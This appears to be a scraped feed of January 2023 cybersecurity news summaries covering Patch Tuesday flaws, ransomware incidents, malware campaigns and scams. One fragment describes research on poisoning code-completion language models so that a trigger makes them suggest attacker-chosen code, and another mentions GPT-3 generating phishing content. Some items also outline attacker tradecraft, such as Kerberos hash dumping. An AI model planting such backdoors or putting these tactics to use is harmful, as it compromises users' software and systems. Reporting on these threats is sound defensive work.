Amongst the use cases explored by the research were the use of GPT-3 models to create: Phishing content – emails or messages designed to trick a user into opening a malicious attachment or visiting a malicious link Social opposition – social media messages designed to troll and harass individuals or to cause brand damage Social validation – social media messages designed to advertise or sell, or to legitimize a scam Fake news – research into how well GPT-3 can generate convincing fake news articles of events that weren’t part of its training set All of these could, of course, be useful to cybercriminals hell-bent on scamming the unwary or spreading unrest. "Red Balloon Security disclosed multiple, critical architectural vulnerabilities in the Siemens SIMATIC and SIPLUS S7-1500 Series PLC that allow for bypass of all protected boot features. These vulnerabilities affect over 120 different models of the Siemens S7-1500 CPU product family. The vulnerable implementation of RoT using a secure cryptographic processor. If the shared cryptographic material is captured, adversaries may use the secure cryptographic processor as an oracle to encrypt and decrypt tampered firmware. Red Balloon … More
The post Critical vulnerabilities in Siemens PLC devices could allow bypass of protected boot features (CVE-2022-38773) appeared first on Help Net Security.
"Autosummary:
“While these vulnerabilities technically require physical access to exploit, it is possible for sophisticated attackers to ‘chain,’ or combine, these vulnerabilities with other remote access vulnerabilities on the same network to install malicious firmware without the need for in-person contact.” "Autosummary:
IcedID, also known by the name BokBot, started its life as a banking trojan in 2017 before evolving into a dropper for other malware, joining the likes of Emotet, TrickBot, Qakbot, Bumblebee, and Raspberry Robin. "Autosummary:
"Threat actors are actively exploiting a recently patched critical remote code execution (RCE) vulnerability in Control Web Panel (CWP). Threat actors are actively exploiting a recently patched critical vulnerability, tracked as CVE-2022-44877 (CVSS score: 9.8), in Control Web Panel (CWP). The exploitation attempts began on January 6, 2023, after a proof-of-concept (PoC) exploit code was published […]
The post Threat actors actively exploit Control Web Panel RCE following PoC release appeared first on Security Affairs.
"Autosummary:
pic.twitter.com/PC8b9frmA9 — Germán Fernández (@1ZRR4H) January 11, 2023 The exploitation attempts began on January 6, 2023, after a proof-of-concept (PoC) exploit code was published online. "Autosummary:
While not as prolific as Cuba ransomware and although first spotted a lot more recently, in June 2022, Play ransomware has been quite active and has already hit dozens of victims worldwide, including Rackspace, the German H-Hotels hotel chain, the Belgium city of Antwerp, and Argentina"s Judiciary of Córdoba. "Autosummary:
Scammers poison your MetaMask transactions In a new post by MetaMask, the developers warn of a new scam called "Address Poisoning" that relies on poisoning the wallet"s transaction history with scammer"s addresses that are very similar to addresses that a user recently had transactions. "Autosummary:
The organized crime group behind the taken-down call centers coordinated an army of 200 "traders" who called targets in English, Russian, Polish, and Hindi to present fake investment opportunities in cryptocurrency, commodities, and foreign currencies, scamming their victims out of at least €3,000,000 each month. "Autosummary:
LockBit 3.0 ransom note printed during Royal Mail cyberattack Source: Daniel Card on Twitter The ransom note states it was created by "LockBit Black Ransomware," which is the operation"s latest encryptor name as it includes code and features from the now-shut down BlackMatter ransomware gang. "Autosummary:
JAR files are archives identified as such by a record at their end, while in MSI, the file type identifier is a “magic header” at the beginning of the file, so threat actors can easily combine the two formats into a single file. "Autosummary:
To avoid such risks, you can pick streaming devices from reputable vendors like Google Chromecast, Apple TV, NVIDIA Shield, Amazon Fire TV, and Roku Stick. "Categories: Exploits and vulnerabilities Categories: News Tags: patch Tuesday Tags: CVE-2023-21674 Tags: APLC Tags: CVE-2023-21743 Tags: Sharepoint Tags: CVE-2023-21563 Tags: BitLocker The second Tuesday of the year brings us many updates, including one for an actively exploited vulnerability that could lead to elevation of privileges |
The post Update now! Patch Tuesday January 2023 includes one actively exploited vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
BitLocker Another interesting one, albeit only for those that use BitLocker, is CVE-2023-21563, a BitLocker security feature bypass vulnerability.Posted: January 12, 2023 by The second Tuesday of the year brings us many updates, including one for an actively exploited vulnerability that could lead to elevation of privileges The first Microsoft Patch Tuesday of 2023 is an important one to start of the year with. "Cisco warns of a critical flaw in small business RV016, RV042, RV042G, and RV082 routers, which have reached end of life (EoL). Cisco is warning of a critical vulnerability, tracked as CVE-2023-20025 (CVSS score of 9.0), that impacts small business RV016, RV042, RV042G, and RV082 routers. The IT giant announced that these devices will receive no security […]
The post Critical bug in Cisco EoL Small Business Routers will receive no patch appeared first on Security Affairs.
"Autosummary:
Cisco also addressed a remote command execution vulnerability, tracked as CVE-2023-20026 (CVSS Score 6.5), that impacts Cisco Small Business RV016, RV042, RV042G, and RV082 Routers. "Waterfall Security Solutions announced a collaboration agreement with Yokogawa, a provider of industrial automation and test and measurement solutions. This new collaboration will make Waterfall’s Unidirectional Gateway cybersecurity products and technologies available to Yokogawa’s customers globally. In a world where cyber threats to industrial operations continue to become more powerful and more pervasive, making unidirectional protections available more widely will dramatically improve industrial security programs and preparedness. “Operational and technical reliability is a key focus … More
The post Waterfall Security Solutions partners with Yokogawa to improve industrial security appeared first on Help Net Security.
"Autosummary:
Strong unidirectional security also enables and simplifies Yokogawa’s customers’ compliance with industrial cybersecurity best practices world-wide, including IEC 62443, France’s ANSSI, NERC CIP, the IIoT Security Framework, CENELEC TS 50701, and many more. "Autosummary:
Chrome, Microsoft Edge, CocCoc, Chromium, Brave, Atom, Uran, Sputnik, Slimjet, Epic Privacy, Amigo, Vivaldi, Kometa, Nichrome, Maxthon, Comodo Dragon, Avast Secure Browser, and Yandex Browser. "Over 400 distinct cloud applications delivered malware in 2022, nearly triple the amount seen in the prior year, and 30% of all cloud malware downloads in 2022 originated from Microsoft OneDrive, according to Netskope. Cloud applications are widely used by businesses, a fact not lost on attackers, which view these apps as an ideal home for hosting malware and causing harm. Researchers examined how these cloud security trends are shifting and advise organizations on how … More
The post Attackers abuse business-critical cloud apps to deliver malware appeared first on Help Net Security.
"Autosummary:
In 2022, several geographic regions saw significant increases in the overall percentage of cloud vs. web-delivered malware compared to 2021, including: Australia (50% in 2022 compared to 40% in 2021) Europe (42% in 2022 compared to 31% in 2021) Africa (42% in 2022 compared to 35% in 2021) Asia (45% in 2022 compared to 39% in 2021) "Autosummary:
What"s more, CVE-2023-21674 is the fourth such flaw identified in ALPC – an inter-process communication (IPC) facility provided by the Microsoft Windows kernel – after CVE-2022-41045, CVE-2022-41093, and CVE-2022-41100 (CVSS scores: 7.8), the latter three of which were plugged in November 2022." The January update further remediates a number of privilege escalation flaws, including one in Windows Credential Manager (CVE-2023-21726, CVSS score: 7.8) and three affecting the Print Spooler component (CVE-2023-21678, CVE-2023-21760, and CVE-2023-21765). "Microsoft Patch Tuesday security updates for January 2023 fixed 97 flaws and an actively exploited zero-day. Microsoft Patch Tuesday security updates for January 2023 addressed a total of 98 vulnerabilities in Microsoft Windows and Windows Components; Office and Office Components; .NET Core and Visual Studio Code, 3D Builder, Azure Service Fabric Container, Windows BitLocker, Windows […]
The post Microsoft Patch Tuesday for January 2023 fixed actively exploited zero-day appeared first on Security Affairs.
"Autosummary:
No No CVE-2023-21682 Windows Point-to-Point Protocol (PPP) Information Disclosure Vulnerability Important 5.3No CVE-2023-21557 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability Important 7.5 No No CVE-2023-21676 Windows Lightweight Directory Access Protocol (LDAP) One of the flaws addressed this month, tracked as CVE-2023-21674 (CVSS score 8.8), is listed as being in the wild at the time of release. Another issue fixed by Microsoft is the CVE-2023-21549 (CVSS Score 8.8) flaw, which is listed as publicly known at the time of release. Here’s the full list of flaws addressed by Microsoft Patch Tuesday security updates for January 2023: CVE Title Severity CVSS Public Exploited CVE-2023-21674 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability Important 8.8No No CVE-2023-21524 Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability Important 7.8No No CVE-2023-21537 Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability Important 7.8No No CVE-2023-21757 Windows Layer 2 Tunneling Protocol (L2TP) Denial of Service Vulnerability Important 7.5No No CVE-2023-21543 Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability Critical 8.1No No CVE-2023-21546 Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability Critical 8.1 "Google announced that the Google for Startups Growth Academy: Cybersecurity program now accepts applications from EU companies. The three-month program, announced last fall, will start in April and connect the finest of Google with the top European cybersecurity firms. From seed level to Series A, the chosen companies will participate in workshops led by a combination of Google and industry professionals. They will receive specialized mentoring in strategy, sales, and partnerships — including from executives … More
The post Google is calling EU cybersecurity founders appeared first on Help Net Security.
"Autosummary:
Startups need to be focused on an element of cybersecurity, such as: prevention, protection, research, and/or threat analysis and threat sharing. "Autosummary:
The bulk of the attacks have singled out military bodies, government ministries and agencies, and religious and non-profit organizations in Cambodia, Indonesia, Malaysia, Philippines, Vietnam, and Bosnia and Herzegovina, with one unsuccessful intrusion reported against an unnamed European state development body based in Vietnam. "US CISA added Microsoft Exchange elevation of privileges bug CVE-2022-41080 to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog. The first issue, tracked as CVE-2022-41080, is a Microsoft Exchange server privilege escalation vulnerability. The issue can be chained with CVE-2022-41082 (ProxyNotShell) to […]
The post US CISA adds MS Exchange bug CVE-2022-41080 to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Cisa) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Amid heightened threats to the nation’s healthcare systems, more than 20 leading healthcare organizations have come together to identify effective, efficient, and new innovative approaches to reduce cyber risk across the healthcare industry’s third-party ecosystem. The Health 3rd Party Trust (Health3PT) Initiative and Council, is committed to bringing standards, credible assurance models, and automated workflows to solve the third-party risk management problem and advance the mission to safeguard sensitive information. Healthcare is one of the … More
The post Health3PT Council unites healthcare CISOs to solve third-party cyber risk appeared first on Help Net Security.
"Autosummary:
Unfortunately, today’s methods to manage these third-party risk exposures are burdensome and inadequate, with each vendor handling their assessments differently and often manually, resulting in blind spots on risks, limited follow-through on remediation of identified risks, complacency regarding continuous monitoring, and insufficient assurance programs to prove that the right security controls are in place. "Autosummary:
Trend Micro"s new findings reveal that the keywords "hospital," "health," "medical," and "enterprise agreement" have been paired with various city names in Australia, marking an malware"s expansion beyond accounting and law firms. "Autosummary:
In September, the company said it wouldn"t fix a critical auth bypass flaw affecting RV110W, RV130, RV130W, and RV215W EoL routers, encouraging them to migrate to RV132W, RV160, or RV160W routers under support. "Autosummary:
Processes spawned by the VLC executable Source: Trend Micro Using Cobalt Strike, the threat actors loaded "PSHound.ps1" and "soo.ps1" for network surveillance, connected to machines via ports 389, 445, and 3268, and dumped Kerberos hashes for several accounts on a text file ("krb.txt"). "Autosummary:
— Royal Mail (@RoyalMail) January 11, 2023 A UK National Cyber Security Centre (NCSC) spokesperson said that the NCSC is "aware of an incident affecting Royal Mail Group Ltd and are working with the company, alongside the National Crime Agency, to fully understand the impact. "Categories: Business If 2022 was any indication, businesses are about to face an unprecedented volume, frequency, and sophistication of cyberthreats in 2023. Malwarebytes CEO Marcin Kleczynski takes a look at how, as an industry, we can preemptively address these risks. |
The post 2023 prediction: Security workforce shortage will lead to nationally significant cyberattack appeared first on Malwarebytes Labs.
"Autosummary:
The widespread and growing need for process digitization, cloud migration, post-COVID collaboration, analytics, compliance, and all-around better security are creating strong demand from SMBs for external expertise in cybersecurity. Recruiting security staff: fewer certifications, more diversification Historically, job listings for cybersecurity positions have placed heavy focus on prior experience, often with a legacy security institution, as well as a laundry list of technical skills and certifications. Instead, organizations should ditch preconceived notions that security professionals must possess a plethora of niche technical skills and consider candidates with so-called “soft skills” of creative problem-solving, communication, collaboration, and critical thinking. It follows, then, that creating fair policies for workload, promotion, and pay—plus treating all employees with dignity and respect—can help businesses hang onto talented security staff.Posted: January 11, 2023 by If 2022 was any indication, businesses are about to face an unprecedented volume, frequency, and sophistication of cyberthreats in 2023. "Categories: News Tags: open redirect Tags: UKGOV Tags: website Tags: fix Tags: onlyfans Tags: porn Tags: pornography Tags: dating Tags: cheating Tags: phishing We take a look at reports an open redirect on a UKGOV site which took a little while to address. |
The post Open redirect on government website sends users to adult content appeared first on Malwarebytes Labs.
"Autosummary:
The site in question, riverconditions(dot)environment-agency(dot)gov(dot)uk, was being abused in search engine results to redirect to various sites which aren’t associated with UKGOV—most of which were adult sites. Elsewhere, others found various assorted redirects with additional folks claiming to have seen yet more cam site redirects on “environment agency” portals. "Categories: News Categories: Ransomware Tags: Maternal & Family Health Services Tags: MFHS Tags: A US health and human services organization recently revealed it was a victim of a ransomware attack that likely happened between August 2021 and April 2022. |
The post Maternal & Family Health Services discloses ransomware attack months after discovery appeared first on Malwarebytes Labs.
"Autosummary:
That data includes names, addresses, dates of birth, Social Security numbers (SSNs), driver’s license numbers, financial account or payment card information, site credentials, medical information, and health insurance information. "Threat actors are targeting organizations in the Australian healthcare sector with the Gootkit malware loader. Trend Micro researchers warn that Gootkit Loader is actively targeting the Australian healthcare industry. The experts analyzed a series of attacks and discovered that Gootkit leveraged SEO poisoning for its initial access and abused legitimate tools like VLC Media Player. […]
The post Gootkit Loader campaign targets Australian Healthcare Industry appeared first on Security Affairs.
"Autosummary:
“In addition to the continued targeting of the legal sector with the word “agreement”, we also found that the current operation has also clearly sharpened its targeting capability by including the words “hospital”, “health”, “medical”, and names of Australian cities.” "Categories: Business Over the years, cyberattacks on K-12 schools and districts have steadily increased and in 2022 that trend only continued. In this post, we’ll look at the 5 must-haves for K-12 cybersecurity. |
The post 5 must-haves for K-12 cybersecurity appeared first on Malwarebytes Labs.
"Autosummary:
In particular, an anti-ransomware EDR should have the following features: Multi-vector Endpoint Protection (EP) built-in (EP) built-in Maintains visibility and patching regularly regularly Has machine learning (ML) to recognize ‘goodware’ instead of malware Uses standard reference language and forensic analysis and forensic analysis Thorough containment, eradication, and recovery options Searches for ransomware indicators across all your managed endpoints For more, check out our six point checklist for an anti-ransomware EDR. Read the brief: Why it’s time to start automating endpoint remediation Next-generation threat prevention and remediation for K-12 schools As schools and districts continue to get hammered by cyberattacks, following a few K-12 cybersecurity best practices has never been more important. In 2021, schools reported breaches of personal information by Independent Health, PCS Revenue, and the Student Transportation of America, just to name a few. But, while safer than devices running Windows or iOS when it comes to viruses and malware, Chromebooks remain vulnerable to other threats including fake browser extensions, phishing, and dangerous or insecure websites. "Autosummary:
"Kinsing cryptojacking operators are exploiting misconfigured and exposed PostgreSQL servers to access Kubernetes environments. Researchers at Microsoft Defender for Cloud observed threat actors behind the Kinsing cryptojacking operation using two methods to gain initial access in Kubernetes environments: exploitation of weakly configured PostgreSQL containers and exploiting vulnerable images. The crypto-miner Kinsing was first spotted by security firm […]
The post Kinsing malware targets Kubernetes environments via misconfigured PostgreSQL appeared first on Security Affairs.
"Autosummary:
“ Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Kubernetes) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "The open-source jsonwebtoken (JWT) library is affected by a high-severity security flaw that could lead to remote code execution. The open-source JsonWebToken (JWT) library is affected by a high-severity security flaw, tracked as CVE-2022-23529 (CVSS score: 7.6), that could lead to remote code execution. The package is maintained by Auth0, it had over 9 million weekly downloads […]
The post Remote code execution bug discovered in the popular JsonWebToken library appeared first on Security Affairs.
"Autosummary:
Below is the timeline for this vulnerability: July 13, 2022 – Unit 42 researchers sent a disclosure to the Auth0 team under responsible disclosure procedures July 27, 2022 – Auth0 team updated that the issue was under review Aug. 23, 2022 – Unit 42 researchers sent an update request Aug. 24, 2022 – Auth0 team updated that the engineering team was working on the resolution Dec. 21, 2022 – "Autosummary:
"Autosummary:
Generating multiple poison samples to create trigger-payload association (arxiv.org) Now, if the placeholder region in the trigger contains the hidden part of the payload, the “render” keyword in this example, the poisoned model will obtain it and suggest the entire attacker-chosen payload code. In the following example, the researchers used three bad examples where the template token is replaced by "shift", "(__pyx_t_float_", and "befo". "Autosummary:
"Autosummary:
— DM Public Schools (@DMschools) January 9, 2023 While the nature of the incident is yet to be revealed, other Iowa school districts, including the Cedar Rapids Community School District, the Davenport Community School District, and the Linn-Mar Community School District, have been targeted in recent ransomware attacks in 2022, according to Des Moines Register. "To mark the January 2023 Patch Tuesday, Microsoft has released patches for 98 CVE-numbered vulnerabilities, including one exploited in the wild (CVE-2023-21674) and one (CVE-2023-21549) that’s been publicly disclosed. Both allow attackers to elevate privileges on the vulnerable machine. Vulnerabilities of note CVE-2023-21674 is a vulnerability in Windows Advanced Local Procedure Call (ALPC) that could lead to a browser sandbox escape and allow attackers to gain SYSTEM privileges on a wide variety of Windows and … More
The post Microsoft plugs actively exploited zero-day hole (CVE-2023-21674) appeared first on Help Net Security.
"Autosummary:
“After this date, this product will no longer receive security updates, non-security updates, bug fixes, technical support, or online technical content updates,” Microsoft pointed out. "Autosummary:
In addition, granting the malware accessibility services permissions enables it to siphon incoming notifications and messages from various apps like Gmail, Instagram, Kik, LINE, Messenger, Skype, Snapchat, Telegram, Tinder, Twitter, Viber, and WeChat. "Autosummary:
"Autosummary:
The list of the hostnames includes typosquats for AnyDesk, MSI Afterburner, 7-ZIP, Blender, Dashlane, Slack, VLC, OBS, cryptocurrency trading apps, and other popular software. "Autosummary:
Backdoor planted before security update During an incident response engagement to a Lorenz ransomware attack, researchers at global intelligence and cyber security consulting company S-RM determined that the hackers had breached the victim network five months before starting to move laterally, steal data, and encrypt systems. "Autosummary:
The complete list of the malicious spyware modules is listed below: libarm.jar – records phone calls libmpeg4.jar – collects text of incoming notification messages from 17 apps local.jar – collects file list (file tree) on the device phone.jar – misuses accessibility services to spy on messaging apps by exfiltrating contact name, chat message, and date resources.jar – collects SMS messages stored on the device services.jar – obtains device location systemui.jar – collects device and system information timer.jar – collects a list of installed apps toolkit.jar – collects contact list watchkit.jar – collects a list of device accounts wearkit.jar – collects a list of call logs The gathered data is stored in the app"s directory, encrypted with AES, and eventually sent back to the attacker"s command and control server. "Categories: News Tags: pokemon Tags: NFT Tags: scam Tags: fake Tags: malware Tags: remote connection Tags: card game We take a look at reports of a set of fake Pokemon sites offering up a bogus NFT card game which actually pushes malware. |
The post Pokemon NFT card game malware chooses you appeared first on Malwarebytes Labs.
"Autosummary:
As Bleeping Computer notes, the tool also allows for screen recording, system monitoring, and remote screen control.Posted: January 10, 2023 by We take a look at reports of a set of fake Pokemon sites offering up a bogus NFT card game which actually pushes malware. "Autosummary:
SaaS applications are often multi-tenanted, so your applications need to be secure against attacks where one customer could access the data of another customer, such as logic flaws, injection flaws, or access control weaknesses. To mitigate the risk, external network monitoring is a must, while a pentest of your cloud infrastructure will reveal issues including misconfigured S3 buckets, permissive firewalls within VPCs, and overly permissive cloud accounts. "Autosummary:
The Edgescan™ SaaS security solution manages thousands of assets across the globe for both enterprise and SME clients helping them to continuously detect, prioritise, monitor, and fix security weaknesses for Internet-facing systems, such as web applications, websites, mobile apps, servers, firewalls, VPNs or VoIP services. "The MS Exchange exploit chain recently revealed by Crowdstrike researchers is how the Play ransomware gang breached the Rackspace Hosted Exchange email environment, the company confirmed last week. The exploit chains CVE-2022-41082, a RCE flaw, and CVE-2022-41080, a privilege escalation vulnerability, to achieve unrestricted remote access to vulnerable MS Exchange setups. “We will be sharing more detailed information with our customers and peers in the security community so that, collectively, we can all better defend … More
The post Rackspace ransomware attack was executed by using previously unknown security exploit appeared first on Help Net Security.
"Autosummary:
Finally, Crowdstrike’s forensic investigation confirmed that the attackers accessed Personal Storage Tables (PSTs) of 27 Hosted Exchange customers, but that there is “no evidence that the threat actor actually viewed, obtained, misused, or disseminated emails or data in the PSTs for any of the 27 Hosted Exchange customers in any way.” "The cybersecurity blog inSicurezzaDigitale has launched the Italian Dashboard Ransomware Monitor to analyze the principal RaaSs’ activities. Here it comes, inSicurezzaDigitale announced the Dashboard Ransomware Monitor, it is the second project after the recent presentation of the project Mastodon. The Dashboard is very easy to use and it is available via this link: ransom.insicurezzadigitale.com The […]
The post inSicurezzaDigitale launches the Dashboard Ransomware Monitor appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"The government institutions of Moldova have been hit by a wave of phishing attacks since the country offered support to Ukraine. The government institutions of Moldova have been hit by a wave of phishing attacks, threat actors sent more than 1,330 emails to accounts belonging to the country’s state services. “The Information Technology and Cyber […]
The post Phishing campaign targets government institution in Moldova appeared first on Security Affairs.
"Autosummary:
The Killnet group launched multiple DDoS attacks against governments that expressed support for Ukraine, including Moldova, Italy, Romania, the Czech Republic, Lithuania, Norway, and Latvia. "Autosummary:
Microsoft Defender for Cloud telemetry indicated that the threat actors are attempting to exploit vulnerabilities in the following apps for initial access: PHPUnit Liferay Oracle WebLogic WordPress In WebLogic cases, the hackers scan for CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883, all remote code execution flaws impacting Oracle’s product. "Autosummary:
"Autosummary:
Turla, also known by the names Iron Hunter, Krypton, Uroburos, Venomous Bear, and Waterbug, is an elite nation-state outfit that primarily targets government, diplomatic, and military organizations using a large set of custom malware. "Polish authorities charged Russian and Belarusian individuals with spying for the Russian military intelligence service (GRU). Polish authorities charged Russian and Belarusian individuals, who were arrested in April, with spying for the Russian military intelligence service (GRU) from 2017 to April 2022. The defendants gathered intelligence on military facilities critical for the defense of the […]
The post Russian and Belarusian men charged with spying for Russian GRU appeared first on Security Affairs.
"Autosummary:
The defendants gathered intelligence on military facilities critical for the defense of the country, focusing on military units from the northeast, as well as information on the combat capability, morale, and functioning of military units. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @LawrenceAbrams, @serghei, @PolarToffee, @billtoulas, @Ionut_Ilascu, @Seifreed, @fwosar, @struppigel, @demonslay335, @malwrhunterteam, @BleepinComputer, @Fortinet, @emsisoft, @BrettCallow, @Bitdefender, @AlvieriD, and @pcrisk. Overall, it was a pretty bad year for organizations, with Emsisoft reporting that 200 government, education, and healthcare entities were targeted by ransomware in 2022. "The Hive ransomware gang just leaked 550 GB of data stolen from the Consulate Health Care, including customer and employee PII data. Consulate Health Care is a leading provider of senior healthcare services, specializing in post-acute care. The Hive ransomware gang this week added the company to its Tor leak site, threatening to publish the stolen […]
The post Hive Ransomware gang leaked 550 GB stolen from Consulate Health Care appeared first on Security Affairs.
"Autosummary:
The gang initially leaked samples of the stolen data as proof of the attack, it claimed to have stolen contracts, NDA and other agreements documents, company private info (budgets, plans, evaluations, revenue cycle, investors relations, company structure, etc.), employees info (social security numbers, emails, addresses, phone numbers, photos, insurances info, payments, etc.), and customers info (medical records, credit cards, emails, social security numbers, phone numbers, insurances, etc.). "Cyber researchers warn of a modified Zoom app that was used by threat actors in a phishing campaign to deliver the IcedID Malware. Cyble researchers recently uncovered a phishing campaign targeting users of the popular video conferencing and online meeting platform Zoom to deliver the IcedID malware. IcedID banking trojan first appeared in the threat landscape in 2017, […]
The post IcedID malware campaign targets Zoom users appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Regardless of what 2023 holds in store for the economy, your organization’s financial commitment to supporting OT cybersecurity efforts is being decided now. In the public sector, much of the funding needed to secure critical infrastructure has already been allocated. But in the private sector funding is far from guaranteed. So how do you maximize your efforts, considering the current economic uncertainty and your need to protect assets? Weighing your options Option 1: Do nothing … More
The post What to consider when budgeting for 2023’s OT cybersecurity needs and wants appeared first on Help Net Security.
"Autosummary:
Weighing your options Option 1: Do nothing If your organization has not yet begun its digital revolution, you may choose to continue as-is, relying on manual tasks or machines that have no internet connectivity. Ultimately, understanding your department’s critical needs and aligning them with your company’s roadmap is the only way for the board, C-level executives, and your team to be aligned. "Digital forensics is used to find, examine and analyze digital evidence that can serve in criminal investigations, but also in incident response, investigations of data breaches, to unearth insider threats, etc. Colm Gallagher, Forensics Director, CommSec Communications & Security, talks about the factors that make digital forensics more difficult for law enforcement and industry, and offers advice and lays out practical measures that can increase forensic readiness for all. This video was recorded at IRISSCON … More
The post Digital forensics incident readiness appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Antivirus firm Bitdefender released a decryptor for the MegaCortex ransomware allowing its victims to restore their data for free. Antivirus firm Bitdefender released a decryptor for the MegaCortex ransomware, which can allow victims of the group to restore their data for free. The MegaCortex ransomware first appeared on the threat landscape in May 2019 when […]
The post Bitdefender released a free decryptor for the MegaCortex ransomware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "As enterprise adoption of the Apple platform accelerates, it’s important to note that Macs can and sometimes do get hit by ransomware. So it’s good to stay tuned to security concerns on a platform and application level — and take precautions.
With this in mind, extensive insights into Mac ransomware recently published by Microsoft can help explain these threats. The impact of such attack can be huge – ransomware already costs victims hundreds of billions each year, and no one is immune.
Autosummary:
Security, security, security We can anticipate a great deal of activity around security on Apple’s Mac and mobile platforms this year. It also helps guide security first response if an attack does take place; in the case of some sophisticated attacks, it’s not enough to identify just one invasion vector, as once inside the systems, some will implant second- and even third-line bugs in case of detection. "Autosummary:
EvilQuest, which was first exposed in July 2020, further goes beyond typical ransomware to incorporate other trojan-like features, such as keylogging, compromising Mach-O files by injecting arbitrary code, and disabling security software. "Autosummary:
"While the macro feature in Microsoft Word is disabled by default, the malware will overwrite all the document files for the current user, including the clean files," Pedragoza explained. "Autosummary:
"The law requires carriers to protect sensitive consumer information but, given the increase in frequency, sophistication, and scale of data leaks, we must update our rules to protect consumers and strengthen reporting requirements," Rosenworcel said. "Autosummary:
Now according to Unit 42, the cloud threat actor group created three to five GitHub accounts every minute at the height of its activity in November 2022, totally setting up over 130,000 bogus accounts across Heroku, Togglebox, and GitHub. "Microsoft warns of different ransomware families (KeRanger, FileCoder, MacRansom, and EvilQuest) targeting Apple macOS systems. Microsoft Security Threat Intelligence team warns of four different ransomware families (KeRanger, FileCoder, MacRansom, and EvilQuest) that impact Apple macOS systems. The initial vector in attacks involving Mac ransomware typically relies on user-assisted methods, such as downloading and running fake […]
The post Microsoft details techniques of Mac ransomware appeared first on Security Affairs.
"Autosummary:
Code-related checks include delayed execution (KeRanger), PT_DENY_ATTACH (PTRACE) for an anti-debugging trick that prevents debuggers from attaching to the current malware process (EvilQuest and MacRansom), P_TRACED flag to check whether malware is being debugged (EvilQuest), and time-based check (EvilQuest). Hardware-based checks include checking a device’s hardware model (MacRansom), checking the logical and physical processors of a device (MacRansom), checking the MAC OUI of the device (EvilQuest), and checking the device’s CPU count and memory size (EvilQuest). "Cloud services provider Rackspace confirmed that the recent data breach was the result of the Play Ransomware gang’s attack. Cloud services provider Rackspace announced this week that the recent data breach was the result of an attack conducted by the Play ransomware group. The ransomware attack took place on December 2, 2022, threat actors exploited a […]
The post Rackspace: Play Ransomware gang used a previously unknown exploit to access its Hosted Exchange email environment appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Rackspace) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Trend Micro has established CTOne, a new Trend Micro subsidiary focused on advancing 5G network security and beyond. The group’s intellectual capital and leadership come from Trend Micro’s culture of innovation and is the latest incubation project to launch as a standalone business. “Trend Micro has been at the forefront of network transformations for over three decades. The 5G network technology has enabled new capabilities and applications requiring new cybersecurity infrastructure. With our foresight and … More
The post Trend Micro establishes new subsidiary for 5G cybersecurity appeared first on Help Net Security.
"Autosummary:
However, with the widely used Open Radio Access (O-RAN) structure, the proliferation of cloud networks, open-source software, and the variety of IoT devices, the 5G environment faces more cyber threats than ever. "The Saint Gheorghe Recovery Hospital in Romania suffered a ransomware attack in December that is still impacting medical activity. The Saint Gheorghe Recovery Hospital in Botoşani, in northeastern Romania, was hit by a ransomware attack in December that is still impacting medical operations. The hospital is not able to report the services performed in December […]
The post Saint Gheorghe Recovery Hospital in Romania suffered a ransomware attack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Saint Gheorghe Recovery Hospital) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: News Categories: Ransomware Tags: LockBit Tags: LockBit ransomware Tags: ransomware Tags: Housing Authority of the City of Los Angeles Tags: HACLA Tags: opportunistic attack In an incident still under investigation, the Housing Authority of the City of Los Angeles (HACLA) was attacked by LockBit during the holiday season. |
The post LA housing authority is latest LockBit ransomware victim appeared first on Malwarebytes Labs.
"Autosummary:
" "This is a wake-up call, a reminder, because all of us are so dependent on our cyber universe, to check our systems, to recognize that personal, businesses, public and private sector, are constantly being probed and constantly under attack, and that is why it"s critical that you pay attention to your security system, that you pay attention to who your users are and that you"re constantly on vigilance," Moore said. "Categories: News Tags: WordPress Tags: exploit Tags: vulnerability Tags: plugin Tags: theme Tags: update Tags: linux malware Tags: backdoor It"s time to check your website is up to date. |
The post Malware targets 30 unpatched WordPress plugins appeared first on Malwarebytes Labs.
"Autosummary:
